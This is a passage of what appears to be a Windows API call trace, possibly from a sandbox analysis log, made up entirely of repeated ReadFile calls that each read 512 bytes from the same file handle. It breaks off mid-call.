ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.473] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.474] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.475] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.476] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.477] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.478] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.479] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.480] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.481] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.482] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.483] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2adcfc, lpOverlapped=0x0 | out: lpBuffer=0x2aeb0c*, lpNumberOfBytesRead=0x2adcfc*=0x200, lpOverlapped=0x0) returned 1 [0223.484] ReadFile (in: hFile=0x58, lpBuffer=0x2aeb0c, nNumberOfBytesToRead=0x200, 